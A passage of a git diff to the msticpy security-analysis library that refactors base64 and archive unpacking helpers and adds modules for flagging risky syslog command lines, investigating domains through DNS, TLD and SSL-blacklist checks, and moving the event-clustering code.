+
+    Parameters
+    ----------
+    binary : bytes
+        byte array of zip file
+
+    Returns
+    -------
+    Tuple[str, Dict[str, bytes]]
+        Filetype + dictionary of file name + file content
+
+    """
     file_obj = io.BytesIO(binary)
-    zip_archive = zipfile.ZipFile(file_obj, mode='r')
-    archive_dict = dict()
-    for item in zip_archive.namelist():
-        archive_file = zip_archive.read(item)
-        archive_dict[item] = archive_file
-    return 'zip', archive_dict
+    with zipfile.ZipFile(file_obj, mode="r") as zip_archive:
+        archive_dict = {}
+        for item in zip_archive.namelist():
+            archive_file = zip_archive.read(item)
+            archive_dict[item] = archive_file
+        return "zip", archive_dict
 
 
 @export
-def get_items_from_tar(binary):
-    """Return dictionary of tar file contents."""
+def get_items_from_tar(binary: bytes) -> Tuple[str, Dict[str, bytes]]:
+    """
+    Return dictionary of tar file contents.
+
+    Parameters
+    ----------
+    binary : bytes
+        byte array of zip file
+
+    Returns
+    -------
+    Tuple[str, Dict[str, bytes]]
+        Filetype + dictionary of file name + file content
+
+    """
     file_obj = io.BytesIO(binary)
     # Open tarfile
-    tar = tarfile.open(mode="r", fileobj=file_obj)
-    archive_dict = dict()
-    # Iterate over every member
-    for item in tar.getnames():
-        tar_file = tar.extractfile(item)
-        archive_file = tar_file.read()
-        archive_dict[item] = archive_file
-    return 'tar', archive_dict
+    with tarfile.open(mode="r", fileobj=file_obj) as tar:
+        archive_dict: Dict[str, bytes] = {}
+        # Iterate over every member
+        for item in tar.getnames():
+            tar_file = tar.extractfile(item)
+            archive_dict[item] = tar_file.read() if tar_file else b""
+        return "tar", archive_dict
 
 
 @export
-def get_hashes(binary):
-    """Return md5, sha1 and sha256 hashes of input byte string."""
-    hash_dict = dict()
-    for hash_type in ['md5', 'sha1', 'sha256']:
-        if hash_type == 'md5':
-            hash_alg = hashlib.md5()
-        elif hash_type == 'sha256':
+def get_hashes(binary: bytes) -> Dict[str, str]:
+    """
+    Return md5, sha1 and sha256 hashes of input byte string.
+
+    Parameters
+    ----------
+    binary : bytes
+        byte string of item to be hashed
+
+    Returns
+    -------
+    Dict[str, str]
+        dictionary of hash algorithm + hash value
+
+    """
+    hash_dict = {}
+    for hash_type in ["md5", "sha1", "sha256"]:
+        if hash_type == "md5":
+            hash_alg = hashlib.md5()  # nosec
+        elif hash_type == "sha1":
+            hash_alg = hashlib.sha1()  # nosec
+        else:
             hash_alg = hashlib.sha256()
-        elif hash_type == 'sha1':
-            hash_alg = hashlib.sha1()
         hash_alg.update(binary)
         hash_dict[hash_type] = hash_alg.hexdigest()
     return hash_dict
 
 
-def _binary_to_bytesio(binary):
+def _binary_to_bytesio(binary: Union[bytes, io.BytesIO]) -> memoryview:
     if isinstance(binary, io.BytesIO):
         return binary.getbuffer()
     return io.BytesIO(binary).getbuffer()
+
+
+def _b64_string_pad(string: str) -> str:
+    if len(string) % 4 == 0:
+        return string
+
+    string = string.rstrip("=")
+    while len(string) % 4 != 0:
+        string = string + "A"
+    return string
+
+
+# pylint: disable=too-few-public-methods
+@pd.api.extensions.register_dataframe_accessor("mp_b64")
+class B64ExtractAccessor:
+    """Base64 Unpack pandas extension."""
+
+    def __init__(self, pandas_obj):
+        """Initialize the extension."""
+        self._df = pandas_obj
+
+    def extract(self, column, **kwargs) -> pd.DataFrame:
+        """
+        Base64 decode strings taken from a pandas dataframe.
+
+        Parameters
+        ----------
+        data : pd.DataFrame
+            dataframe containing column to decode
+        column : str
+            Name of dataframe text column
+        trace : bool, optional
+            Show additional status (the default is None)
+        utf16 : bool, optional
+            Attempt to decode UTF16 byte strings
+
+        Returns
+        -------
+        pd.DataFrame
+            Decoded string and additional metadata in dataframe
+
+        Notes
+        -----
+        Items that decode to utf-8 or utf-16 strings will be returned as decoded
+        strings replaced in the original string. If the encoded string is a
+        known binary type it will identify the file type and return the hashes
+        of the file. If any binary types are known archives (zip, tar, gzip) it
+        will unpack the contents of the archive.
+        For any binary it will return the decoded file as a byte array, and as a
+        printable list of byte values.
+
+        The columns of the output DataFrame are:
+
+        - decoded string: this is the input string with any decoded sections
+          replaced by the results of the decoding
+        - reference : this is an index that matches an index number in the
+          decoded string (e.g. <<encoded binary type=pdf index=1.2').
+        - original_string : the string prior to decoding - file_type : the type
+          of file if this could be determined
+        - file_hashes : a dictionary of hashes (the md5, sha1 and sha256 hashes
+          are broken out into separate columns)
+        - input_bytes : the binary image as a byte array
+        - decoded_string : printable form of the decoded string (either string
+          or list of hex byte values)
+        - encoding_type : utf-8, utf-16 or binary
+        - md5, sha1, sha256 : the respective hashes of the binary file_type,
+          file_hashes, input_bytes, md5, sha1, sha256 will be null if this item is
+          decoded to a string
+        - src_index - the index of the source row in the input
+          frame.
+
+        """
+        return unpack_df(data=self._df, column=column, **kwargs)
diff --git a/msticpy/sectools/cmd_line.py b/msticpy/sectools/cmd_line.py
new file mode 100644
index 000000000..6e8d2c0e4
--- /dev/null
+++ b/msticpy/sectools/cmd_line.py
@@ -0,0 +1,172 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""
+cmd_line - Syslog Command processing module.
+
+Contains a series of functions required to correct collect, parse and visualise
+linux syslog data.
+
+Designed to support standard linux syslog for investigations where auditd
+is not avalaible.
+
+"""
+import os
+import re
+import json
+
+import datetime as dt
+import numpy as np
+import pandas as pd
+
+from .._version import VERSION
+from ..common.exceptions import MsticpyException
+from ..common.utility import export
+from .base64unpack import unpack
+
+__version__ = VERSION
+__author__ = "Pete Bryan"
+
+_DETECTIONS_DEF_DIR = "resources"
+
+
+@export
+def risky_cmd_line(
+    events: pd.DataFrame,
+    log_type: str,
+    detection_rules: str = os.path.join(
+        os.path.join(os.path.dirname(os.path.dirname(__file__)), _DETECTIONS_DEF_DIR),
+        "cmd_line_rules.json",
+    ),
+    cmd_field: str = "Command",
+) -> dict:
+    """
+    Detect patterns of risky commands in syslog messages.
+
+    Risky patterns are defined in a json format file.
+
+    Parameters
+    ----------
+    events: pd.DataFrame
+        A DataFrame of all syslog events potentially containing risky
+        command line activity.
+    log_type: str
+        The log type of the data included in events.
+        Must correspond to a detection type in detection_rules file.
+    detection_rules: str, optional
+        Path to json file containing patterns of risky activity to detect.
+        (Defaults to msticpy/resources/cmd_line_rules.json)
+    cmd_field: str, optional;
+        The column in the events dataset that contains the command lines to
+        be analysed.
+        (Defaults to "Command")
+
+    Returns
+    -------
+    risky actions: dict
+        A dictionary of commands that match a risky pattern
+
+    Raises
+    ------
+    MsticpyException
+        The provided dataset does not contain the cmd_field field
+
+    """
+    if cmd_field not in events.columns:
+        raise MsticpyException(
+            f"The provided dataset does not contain the {cmd_field} field"
+        )
+
+    events[cmd_field].replace("", np.nan, inplace=True)
+    activity = (
+        events[["TimeGenerated", cmd_field]]
+        .dropna()
+        .set_index("TimeGenerated")
+        .to_dict()
+    )
+    with open(detection_rules, "r", encoding="utf-8") as json_file:
+        rules = json.load(json_file)
+
+    # Decode any Base64 encoded commands so we can match on them as well
+    b64_regex = re.compile(
+        "(?P<b64>(?:[A-Za-z0-9+/]{4})*(?:[A-Za-z0-9+/]{2}==|"
+        + "[A-Za-z0-9+/]{3}=|[A-Za-z0-9+/]{4})$)"
+    )
+    risky_actions = {}
+    detections = rules[log_type]
+    for detection in detections:
+        for date, message in activity[cmd_field].items():
+            if b64_regex.match(message):
+                b64match = b64_regex.search(message)
+                b64string = unpack(input_string=b64match[1])  # type: ignore
+                b64string = b64string[1]["decoded_string"].to_string()  # type: ignore
+                if re.match(detection, message):
+                    risky_actions.update({date: message})
+                else:
+                    pass
+            else:
+                if re.match(detection, message):
+                    risky_actions.update({date: message})
+                else:
+                    pass
+    return risky_actions
+
+
+@export
+def cmd_speed(
+    cmd_events: pd.DataFrame, cmd_field: str, time: int = 5, events: int = 10
+) -> list:
+    """
+    Detect patterns of cmd_line activity whose speed of execution may be suspicious.
+
+    Parameters
+    ----------
+    cmd_events: pd.DataFrame
+        A DataFrame of all sudo events to check.
+    cmd_field: str
+        The column of the event data that contains command line activity
+    time: int, optional
+        Time window in seconds in which to evaluate speed of execution against
+        (Defaults to 5)
+    events: int, optional
+        Number of syslog command execution events in which to evaluate
+        speed of execution against
+        (Defaults to 10)
+
+    Returns
+    -------
+    risky suspicious_actions: list
+        A list of commands that match a risky pattern
+
+    Raises
+    ------
+    AttributeError
+        If cmd_field is not in supplied data set or TimeGenerated note datetime format
+
+    """
+    if cmd_field not in cmd_events.columns:
+        raise MsticpyException(f"Dataframe does not contain {cmd_field} column")
+
+    if isinstance(cmd_events["TimeGenerated"].iloc[0], dt.datetime) is False:
+        raise MsticpyException("TimeGenerated is not a datetime format")
+
+    suspicious_actions = []
+    cmd_events[cmd_field].replace("", np.nan, inplace=True)
+    # Only focus on logs that contain comand line activity
+    actions = cmd_events.dropna(subset=[cmd_field]).reset_index()
+    df_len = len(actions.index) - (events + 1)
+    while df_len >= 0:
+        delta = (
+            actions["TimeGenerated"][(df_len + events)]
+            - actions["TimeGenerated"][df_len]
+        )
+        if delta < dt.timedelta(seconds=time):
+            suspicious_actions.append(
+                {df_len: [actions[df_len : (df_len + events)], delta]}  # noqa: E203
+            )
+        else:
+            pass
+        df_len = df_len - 1
+    return suspicious_actions
diff --git a/msticpy/sectools/domain_utils.py b/msticpy/sectools/domain_utils.py
new file mode 100644
index 000000000..fe0aecf30
--- /dev/null
+++ b/msticpy/sectools/domain_utils.py
@@ -0,0 +1,351 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""
+Functions to support investigation of a domain or url.
+
+Includes functions to conduct common investigation steps when dealing
+with a domain or url, such as getting a screenshot or validating the TLD.
+
+"""
+from datetime import datetime
+from enum import Enum
+import json
+import ssl
+import time
+from typing import Any, Dict, Optional, Tuple
+from urllib.error import HTTPError, URLError
+
+import cryptography as crypto
+from cryptography.x509 import Certificate
+import pandas as pd
+import httpx
+import tldextract
+
+# pylint: disable=no-name-in-module
+from dns.resolver import Resolver
+from dns.exception import DNSException
+
+# pylint: enable=no-name-in-module
+from IPython import display
+from ipywidgets import IntProgress
+from urllib3.exceptions import LocationParseError
+from urllib3.util import parse_url
+
+from .._version import VERSION
+from ..common import pkg_config as config
+from ..common.exceptions import MsticpyUserConfigError
+from ..common.utility import export
+
+__version__ = VERSION
+__author__ = "Pete Bryan"
+
+
+@export
+def screenshot(url: str, api_key: str = None) -> httpx.Response:
+    """
+    Get a screenshot of a url with Browshot.
+
+    Parameters
+    ----------
+    url : str
+        The url a screenshot is wanted for.
+    api_key : str (optional)
+        Browshot API key. If not set msticpyconfig checked for this.
+
+    Returns
+    -------
+    image_data: httpx.Response
+        The final screenshot request response data.
+
+    """
+    # Get Browshot API key from kwargs or config
+    if api_key is not None:
+        bs_api_key: Optional[str] = api_key
+    else:
+        bs_conf = config.settings.get("DataProviders", {}).get(
+            "Browshot"
+        ) or config.settings.get("Browshot")
+        bs_api_key = None
+        if bs_conf is not None:
+            bs_api_key = bs_conf.get("Args", {}).get("AuthKey")  # type: ignore
+
+    if bs_api_key is None:
+        raise MsticpyUserConfigError(
+            "No configuration found for Browshot",
+            "Please add a section to msticpyconfig.yaml:",
+            "DataProviders:",
+            "  Browshot:",
+            "    Args:",
+            "      AuthKey: {your_auth_key}",
+            title="Browshot configuration not found",
+            browshot_uri=("Get an API key for Browshot", "https://api.browshot.com/"),
+        )
+
+    # Request screenshot from Browshot and get request ID
+    id_string = f"https://api.browshot.com/api/v1/screenshot/create?url={url}/&instance_id=26&size=screen&cache=0&key={bs_api_key}"  # pylint: disable=line-too-long
+    id_data = httpx.get(id_string)
+    bs_id = json.loads(id_data.content)["id"]
+    status_string = (
+        f"https://api.browshot.com/api/v1/screenshot/info?id={bs_id}&key={bs_api_key}"
+    )
+    image_string = f"https://api.browshot.com/api/v1/screenshot/thumbnail?id={bs_id}&zoom=50&key={bs_api_key}"  # pylint: disable=line-too-long
+    # Wait until the screenshot is ready and keep user updated with progress
+    print("Getting screenshot")
+    progress = IntProgress(min=0, max=40)
+    display.display(progress)
+    ready = False
+    while not ready:
+        progress.value += 1
+        status_data = httpx.get(status_string)
+        status = json.loads(status_data.content)["status"]
+        if status == "finished":
+            ready = True
+        else:
+            time.sleep(0.05)
+    progress.value = 40
+
+    # Once ready get the screenshot
+    image_data = httpx.get(image_string)
+
+    if image_data.status_code != 200:
+        print(
+            "There was a problem with the request, please check the status code for details"
+        )
+
+    return image_data
+
+
+# Backward compat with dnspython 1.x
+# If v2.x installed use non-deprecated "resolve" method
+# otherwise use "query"
+_dns_resolver = Resolver()
+if hasattr(_dns_resolver, "resolve"):
+    _dns_resolve = getattr(_dns_resolver, "resolve")
+else:
+    _dns_resolve = getattr(_dns_resolver, "query")
+
+
+@export
+class DomainValidator:
+    """Assess a domain's validity."""
+
+    _ssl_abuse_list: pd.DataFrame = pd.DataFrame()
+
+    @classmethod
+    def _check_and_load_abuselist(cls):
+        """Pull IANA TLD list and save to internal attribute."""
+        if cls._ssl_abuse_list is None or cls._ssl_abuse_list.empty:
+            cls._ssl_abuse_list: pd.DataFrame = cls._get_ssl_abuselist()
+
+    @property
+    def ssl_abuse_list(self) -> pd.DataFrame:
+        """
+        Return the class SSL Blacklist.
+
+        Returns
+        -------
+        pd.DataFrame
+            SSL Blacklist
+
+        """
+        self._check_and_load_abuselist()
+        return self._ssl_abuse_list
+
+    @staticmethod
+    def validate_tld(url_domain: str) -> bool:
+        """
+        Validate if a domain's TLD is valid.
+
+        Parameters
+        ----------
+        url_domain : str
+            The url or domain to validate.
+
+        Returns
+        -------
+        result:
+            True if valid public TLD, False if not.
+
+        """
+        _, _, tld = tldextract.extract(url_domain.lower())
+        return bool(tld)
+
+    @staticmethod
+    def is_resolvable(url_domain: str) -> bool:  # pylint: disable=no-self-use
+        """
+        Validate if a domain or URL be be resolved to an IP address.
+
+        Parameters
+        ----------
+        url_domain : str
+            The url or domain to validate.
+
+        Returns
+        -------
+        result:
+            True if valid resolvable, False if not.
+
+        """
+        try:
+            _dns_resolve(url_domain, "A")
+            return True
+        except DNSException:
+            return False
+
+    def in_abuse_list(self, url_domain: str) -> Tuple[bool, Optional[Certificate]]:
+        """
+        Validate if a domain or URL's SSL cert the abuse.ch SSL Abuse List.
+
+        Parameters
+        ----------
+        url_domain : str
+            The url or domain to validate.
+
+        Returns
+        -------
+        Tuple[bool, Optional[Certificate]]:
+            True if valid in the list, False if not.
+            Certificate - the certificate loaded from the domain.
+
+        """
+        x509: Optional[Certificate]
+        try:
+            cert = ssl.get_server_certificate((url_domain, 443))
+            # pylint: disable=no-value-for-parameter
+            x509 = crypto.x509.load_pem_x509_certificate(  # type: ignore
+                cert.encode("ascii")
+            )
+            # pylint: enable=no-value-for-parameter
+            cert_sha1 = x509.fingerprint(
+                crypto.hazmat.primitives.hashes.SHA1()  # type: ignore # nosec
+            )
+            result = bool(
+                self.ssl_abuse_list["SHA1"]
+                .str.contains(cert_sha1.hex())
+                .any()  # type: ignore
+            )
+        except Exception:  # pylint: disable=broad-except
+            result = False
+            x509 = None
+
+        return result, x509
+
+    @classmethod
+    def _get_ssl_abuselist(cls) -> pd.DataFrame:
+        """Download and load abuse.ch SSL Abuse List."""
+        try:
+            ssl_ab_list = pd.read_csv(
+                "https://sslbl.abuse.ch/blacklist/sslblacklist.csv", skiprows=8
+            )
+        except (ConnectionError, HTTPError, URLError):
+            ssl_ab_list = pd.DataFrame({"SHA1": []})
+
+        return ssl_ab_list
+
+
+def dns_components(domain: str) -> dict:
+    """
+    Return components of domain as dict.
+
+    Parameters
+    ----------
+    domain : str
+        The domain to extract.
+
+    Returns
+    -------
+    dict:
+        Returns subdomain and TLD components from a domain.
+
+    """
+    return tldextract.extract(domain.lower())._asdict()
+
+
+def url_components(url: str) -> Dict[str, str]:
+    """Return parsed Url components as dict."""
+    try:
+        return parse_url(url)._asdict()
+    except LocationParseError:
+        return {}
+
+
+def dns_resolve(url_domain: str, rec_type: str = "A") -> Dict[str, Any]:
+    """
+    Validate if a domain or URL be be resolved to an IP address.
+
+    Parameters
+    ----------
+    url_domain : str
+        The url or domain to validate.
+    rec_type : str
+        The DNS record type to query, by default "A"
+
+    Returns
+    -------
+    Dict[str, Any]:
+        Resolver result as dictionary.
+
+    """
+    domain = parse_url(url_domain).host
+    try:
+        return _resolve_resp_to_dict(_dns_resolve(domain, rdtype=rec_type))
+    except DNSException as err:
+        return {
+            "qname": domain,
+            "rdtype": rec_type,
+            "response": str(err),
+        }
+
+
+def ip_rev_resolve(ip_address: str) -> Dict[str, Any]:
+    """
+    Reverse lookup for IP Address.
+
+    Parameters
+    ----------
+    ip_address : str
+        The IP address to query.
+
+    Returns
+    -------
+    Dict[str, Any]:
+        Resolver result as dictionary.
+
+    """
+    try:
+        return _resolve_resp_to_dict(_dns_resolve(ip_address, raise_on_no_answer=True))
+    except DNSException as err:
+        return {
+            "qname": ip_address,
+            "rdtype": "PTR",
+            "response": str(err),
+        }
+
+
+def _resolve_resp_to_dict(resolver_resp):
+    """Return Dns Python resolver response to dict."""
+    rdtype = (
+        resolver_resp.rdtype.name
+        if isinstance(resolver_resp.rdtype, Enum)
+        else str(resolver_resp.rdtype)
+    )
+    rdclass = (
+        resolver_resp.rdclass.name
+        if isinstance(resolver_resp.rdclass, Enum)
+        else str(resolver_resp.rdclass)
+    )
+
+    return {
+        "qname": str(resolver_resp.qname),
+        "rdtype": rdtype,
+        "rdclass": rdclass,
+        "response": str(resolver_resp.response),
+        "nameserver": getattr(resolver_resp, "nameserver", None),
+        "port": getattr(resolver_resp, "port", None),
+        "canonical_name": str(resolver_resp.canonical_name),
+        "rrset": [str(res) for res in resolver_resp.rrset],
+        "expiration": datetime.utcfromtimestamp(resolver_resp.expiration),
+    }
diff --git a/msticpy/sectools/eventcluster.py b/msticpy/sectools/eventcluster.py
index f66ab6e0a..2df146650 100644
--- a/msticpy/sectools/eventcluster.py
+++ b/msticpy/sectools/eventcluster.py
@@ -3,322 +3,20 @@
 # Licensed under the MIT License. See License.txt in the project root for
 # license information.
 # --------------------------------------------------------------------------
-"""
-eventcluster module.
-
-Contains:
-dbcluster_events: generic clustering method using DBSCAN designed to summarize
-process events and other similar data by grouping on common features.
-
-add_process_features: derives numerical features from text features such as
-commandline and process path.
-"""
-from math import log10, floor
-
-import numpy as np
-import pandas as pd
-from sklearn.cluster import DBSCAN
-from sklearn.preprocessing import Normalizer
-
-from .. nbtools.utility import export, pd_version_23
-from .. _version import VERSION
+"""Deprecated placeholder for eventcluster.py."""
+import warnings
+from .._version import VERSION
 
 __version__ = VERSION
-__author__ = 'Ian Hellen'
-
-
-@export
-def dbcluster_events(data, cluster_columns=None, verbose=False, normalize=True,
-                     time_column='TimeCreatedUtc',
-                     max_cluster_distance=0.01, min_cluster_samples=2,
-                     **kwargs):
-    """
-    Cluster data set according to cluster_columns features.
-
-    Uses sklearn DBSCAN
-        :param data: Input data as a pandas DataFrame or numpy array
-        :param cluster_columns=None: List of columns to use for features
-            for DataFrame this is a list of column names
-            for numpy array this is a list of column indexes
-        :param verbose=False: Print additional information about clustering
-            results
-        :param normalize=True: Normalize the input data (should probably always be True)
-        :param time_column='TimeCreatedUtc': If there is a time column the output
-            data will be ordered by this
-        :param max_cluster_distance=0.01: DBSCAN eps (max cluster member distance)
-        :param min_cluster_samples=2: DBSCAN min_samples (the minimum cluster size)
-        :param **kwargs: Other arguments are passed to DBSCAN constructor
-    """
-    allowed_types = [np.ndarray, pd.DataFrame]
-
-    x_input = None
-    if isinstance(data, pd.DataFrame):
-        src_columns = data.columns
-        if cluster_columns is None:
-            x_input = data.values
-        else:
-            x_input = data[cluster_columns].values
-    elif isinstance(data, np.ndarray):
-        if cluster_columns is None:
-            x_input = data
-        else:
-            x_input = data[:, cluster_columns].values
-
-    if x_input is None:
-        mssg = 'Input data not in expected format.\n{} is not one of allowed types {}'
-        type_list = ', '.join([str(t) for t in allowed_types])
-        mssg = mssg.format(str(type(data)), type_list)
-        raise ValueError(mssg)
-
-    # Create output frame
-    clustered_events = pd.DataFrame(columns=src_columns)
-
-    # Create DBSCAN cluster object
-    db_cluster = DBSCAN(eps=max_cluster_distance,
-                        min_samples=min_cluster_samples,
-                        **kwargs)
-
-    # Normalize the data (most clustering algorithms don't do well with
-    # unnormalized data)
-    if normalize:
-        x_norm = Normalizer().fit_transform(x_input)
-    else:
-        x_norm = x_input
-
-    # fit the data set
-    db_cluster.fit(x_norm)
-    labels = db_cluster.labels_
-    cluster_set, counts = np.unique(labels, return_counts=True)
-    if verbose:
-        print('Clustering for set size ', len(x_norm),
-              ' - ', len(cluster_set), ' clusters')
-        print('Individual cluster sizes: ',
-              ', '.join([str(c) for c in counts]))
-
-    # Iterate through clusters, adding exemplar to output frame
-    # pylint: disable=C0200
-    # we need to know the index of the item within the loop
-    for idx in range(len(cluster_set)):
-        cluster_id = cluster_set[idx]
-        class_members = labels == cluster_id
-        if isinstance(data, pd.DataFrame):
-            last_event_time = data[class_members][-1:][time_column].iat[0]
-        else:
-            last_event_time = None
-
-        if cluster_id == -1:
-            # 'Noise' events are individual items that could not be assigned
-            # to a cluster and so are unique
-            if pd_version_23():
-                clustered_events = clustered_events.append(
-                    data[class_members].assign(Clustered=False,
-                                               ClusterId=cluster_id,
-                                               ClusterSize=1,
-                                               LastEventTime=last_event_time),
-                    sort=False)
-            else:
-                clustered_events = clustered_events.append(
-                    data[class_members].assign(Clustered=False,
-                                               ClusterId=cluster_id,
-                                               ClusterSize=1,
-                                               LastEventTime=last_event_time))
-        else:
-            # Otherwise, just choose the first example of the cluster set
-            if pd_version_23():
-                clustered_events = clustered_events.append(
-                    data[class_members].assign(Clustered=True,
-                                               ClusterId=cluster_id,
-                                               ClusterSize=counts[idx],
-                                               LastEventTime=last_event_time)[0:1],
-                    sort=False)
-            else:
-                clustered_events = clustered_events.append(
-                    data[class_members].assign(Clustered=True,
-                                               ClusterId=cluster_id,
-                                               ClusterSize=counts[idx],
-                                               LastEventTime=last_event_time)[0:1])
-
-    # pylint: enable=C0200
-    if verbose:
-        print('Cluster output rows: ', len(clustered_events))
-
-    return clustered_events, db_cluster, x_norm
-
-
-@export
-def add_process_features(input_frame, path_separator=None, force=False):
-    r"""
-    Add numerical features based on patterns of command line and process name.
-
-        :param input_frame: The input dataframe
-        :param path_separator=None: Path separator - if not supplied, try to determine
-            from 'NewProcessName' column of first 10 rows
-        :param force=False: Forces re-calculation of feature columns even if they
-            already exist
-
-    Features:
-        processNameLen: length of process file name (inc path)
-        processNameTokens: the number of elements in the path
-        processName: the process file name (minus path)
-        commandlineTokens: number of space-separated tokens in the command line
-        commandlineLen: length of the command line
-        commandlineLogLen: log10 length of commandline
-        isSystemSession: 1 if session Id is 0x3e7 for Windows or -1 for Linux
-        commandlineTokensFull: counts number of token separators in commandline
-            [\s\-\\/\.,"\'|&:;%$()]
-        pathScore: sum of ord() value of characters in path
-        pathLogScore: log10 of pathScore
-        commandlineScore: sum of ord() value of characters in commandline
-        commandlineLogScore: log10 of commandlineScore
-    """
-    output_df = input_frame.copy()
-
-    # Set any NaN values to empty string
-    if 'NewProcessName' in output_df and 'CommandLine' in output_df:
-        output_df[['NewProcessName', 'CommandLine']] = output_df[['NewProcessName',
-                                                                  'CommandLine']].fillna(value='')
-
-    # try to determine the path separator
-    if path_separator is None:
-        sample_df = output_df.head(10)
-        lx_path = len(sample_df[sample_df['NewProcessName'].str.contains('/')])
-        if lx_path:
-            path_separator = '/'
-        else:
-            path_separator = '\\'
-
-    # Create features from process name and command line
-    if 'NewProcessName' in output_df:
-        if 'processNameLen' not in output_df or force:
-            output_df['processNameLen'] = output_df.apply(lambda x:
-                                                          len(x.NewProcessName),
-                                                          axis=1)
-        if 'processNameTokens' not in output_df or force:
-            output_df['processNameTokens'] = output_df.apply(lambda x:
-                                                             len(x.NewProcessName.split(
-                                                                 path_separator)),
-                                                             axis=1)
-        if 'processName' not in output_df or force:
-            output_df['processName'] = output_df.apply(lambda x:
-                                                       x.NewProcessName.split(
-                                                           path_separator)[-1],
-                                                       axis=1)
-        if 'pathScore' not in output_df or force:
-            output_df['pathScore'] = output_df.apply(lambda x:
-                                                     _string_score(
-                                                         x.NewProcessName),
-                                                     axis=1)
-        if 'pathLogScore' not in output_df or force:
-            output_df['pathLogScore'] = output_df.apply(lambda x:
-                                                        log10(x.pathScore)
-                                                        if x.pathScore else 0,
-                                                        axis=1)
-
-    if 'CommandLine' in output_df:
-        if 'commandlineTokens' not in output_df or force:
-            output_df['commandlineTokens'] = output_df.apply(lambda x:
-                                                             len(x.CommandLine.split(
-                                                                 path_separator)),
-                                                             axis=1)
-        if 'commandlineLen' not in output_df or force:
-            output_df['commandlineLen'] = output_df.apply(lambda x:
-                                                          len(x.CommandLine),
-                                                          axis=1)
-        if 'commandlineLogLen' not in output_df or force:
-            output_df['commandlineLogLen'] = output_df.apply(lambda x:
-                                                             log10(
-                                                                 x.commandlineLen)
-                                                             if x.commandlineLen else 0, axis=1)
-        if 'commandlineTokensFull' not in output_df or force:
-            delim_rgx = r'[\s\-\\/\.,"\'|&:;%$()]'
-            output_df['commandlineTokensFull'] = (output_df[['CommandLine']]
-                                                  .apply(lambda x: x.str.count(delim_rgx),
-                                                         axis=1))
-
-        if 'commandlineScore' not in output_df or force:
-            output_df['commandlineScore'] = output_df.apply(lambda x:
-                                                            _string_score(
-                                                                x.CommandLine),
-                                                            axis=1)
-        if 'commandlineLogScore' not in output_df or force:
-            output_df['commandlineLogScore'] = output_df.apply(lambda x:
-                                                               log10(
-                                                                   x.commandlineScore)
-                                                               if x.commandlineScore else 0,
-                                                               axis=1)
-
-    if 'SubjectLogonId' in output_df:
-        if (('isSystemSession' not in output_df or force) and 'SubjectLogonId' in output_df):
-            output_df['isSystemSession'] = output_df.apply(lambda x:
-                                                           True if x.SubjectLogonId == '0x3e7' or
-                                                           x.SubjectLogonId == '-1' else False,
-                                                           axis=1)
-
-    return output_df
-
-
-@export
-def delim_count(input_row: pd.Series, column: str,
-                delim_list: str = r'[\s\-\\/\.,"\'|&:;%$()]') -> int:
-    r"""
-    Count the delimiters in input column.
-
-        :param input_row:pd.Series: The series to process
-        :param column:str: Column name
-        :param delim_list:str=r'[\s\-\\/\."\'|&:;%$()]: delimiters to use.
-    """
-    return input_row[column].str.count(delim_list)
-
-
-@export
-def char_ord_score(input_row: pd.Series, column: str, scale: int = 1) -> int:
-    """
-    Return sum of ord values of characters in string.
-
-    This function sums the ordinal value of each character in the
-    input string. Two strings with minor differences will result in
-    a similar score. However, for strings with highly variable content
-    (e.g. command lines or http requests containing GUIDs) this may result
-    in too much variance to be useful when you are trying to detect
-    similar patterns. You can use the scale parameter to reduce the
-    influence of features using this function on clustering and anomaly
-    algorithms.
-
-    Arguments:
-        input_row {pd.Series} -- The series to process
-        column {str} -- Column name
-        scale {int} -- reduce the scale of the feature (reducing the
-            influence of variations this feature on the )
-
-    Keyword Arguments:
-        delimiter {str} -- Delimiter used to split the column string (default: {' '})
-
-    Returns:
-        {int} -- count of tokens
-
-    """
-    return floor(sum([ord(x) for x in input_row[column]]) / scale)
-
-
-@export
-def token_count(input_row: pd.Series, column: str, delimiter: str = ' ') -> int:
-    """
-    Return delimiter-separated tokens pd.Series column.
-
-    Arguments:
-        input_row {pd.Series} -- The series to process
-        column {str} -- Column name
-
-    Keyword Arguments:
-        delimiter {str} -- Delimiter used to split the column string (default: {' '})
-
-    Returns:
-        {int} -- count of tokens
+__author__ = "Ian Hellen"
 
-    """
-    return len(input_row[column].split(delimiter))
 
+# flake8: noqa: F403, F401
+# pylint: disable=wildcard-import, unused-wildcard-import, unused-import
+from ..analysis.eventcluster import *
 
-def _string_score(input_str):
-    """Sum the ord(c) for characters in a string."""
-    return sum([ord(x) for x in input_str])
+WARN_MSSG = (
+    "This module has moved to msticpy.analysis.eventcluster\n"
+    + "Please change your import to reflect this new location."
+)
+warnings.warn(WARN_MSSG, category=DeprecationWarning)
diff --git a/msticpy/sectools/geoip.py b/msticpy/sectools/geoip.py
index d875025d5..9fd156eaf 100644
--- a/msticpy/sectools/geoip.py
+++ b/msticpy/sectools/geoip.py
@@ -1,179 +1,370 @@
-
 # -------------------------------------------------------------------------
 # Copyright (c) Microsoft Corporation. All rights reserved.
 # Licensed under the MIT License. See License.txt in the project root for
 # license information.
 # --------------------------------------------------------------------------
-"""geoip module using ipstack."""
-# import gzip
-from json import JSONDecodeError
+"""
+Geoip Lookup module using IPStack and Maxmind GeoLite2.
+
+Geographic location lookup for IP addresses. This module has two classes
+for different services:
+
+-  GeoLiteLookup - Maxmind Geolite (see https://www.maxmind.com)
+-  IPStackLookup - IPStack (see https://ipstack.com)
+
+Both services offer
+a free tier for non-commercial use. However, a paid tier will
+normally get you more accuracy, more detail and a higher throughput
+rate. Maxmind geolite uses a downloadable database, while IPStack is
+an online lookup (API key required).
+
+"""
 import math
 import os
-from abc import ABC, abstractmethod
+import random
+import tarfile
+import warnings
+from abc import ABCMeta, abstractmethod
 from collections.abc import Iterable
 from datetime import datetime, timedelta
-from typing import Tuple
-from IPython import get_ipython
-from IPython.display import display, HTML
+from json import JSONDecodeError
+from pathlib import Path
+from time import sleep
+from typing import Any, Dict, List, Mapping, Optional, Tuple
 
-from geolite2 import geolite2
+import geoip2.database  # type: ignore
 import pandas as pd
-import requests
+import httpx
+from geoip2.errors import AddressNotFoundError  # type: ignore
+from IPython import get_ipython
+from IPython.display import HTML, display
 
-from .. nbtools.entityschema import GeoLocation, IpAddress
-from .. nbtools.utility import export
-from .. _version import VERSION
